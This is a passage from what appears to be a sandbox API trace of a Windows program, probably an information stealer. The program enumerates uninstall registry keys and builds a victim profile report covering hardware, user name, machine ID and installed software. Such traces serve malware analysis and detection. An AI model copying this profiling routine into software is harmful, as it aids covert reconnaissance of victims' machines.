16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\n", lpString2="Outils de vérification linguistique 2016 de Microsoft Office - Français" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français" [0175.915] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="16.0.4266.1001", lpcbData=0x197fd4*=0xf) returned 0x0 [0175.915] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français " [0175.915] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français ", lpString2="16.0.4266.1001" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001" [0175.915] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\n" [0175.915] RegCloseKey (hKey=0x354) returned 0x0 [0175.915] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x26, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-001F-0C0A-0000-0000000FF1CE}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.915] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-001F-0C0A-0000-0000000FF1CE}") returned 90 [0175.915] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-001F-0C0A-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.916] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Herramientas de corrección de Microsoft Office 2016: español", lpcbData=0x197fd4*=0x3d) returned 0x0 [0175.916] lstrlenA (lpString="Herramientas de corrección de Microsoft Office 2016: español") returned 60 [0175.916] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\n", lpString2="Herramientas de corrección de Microsoft Office 2016: español" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: 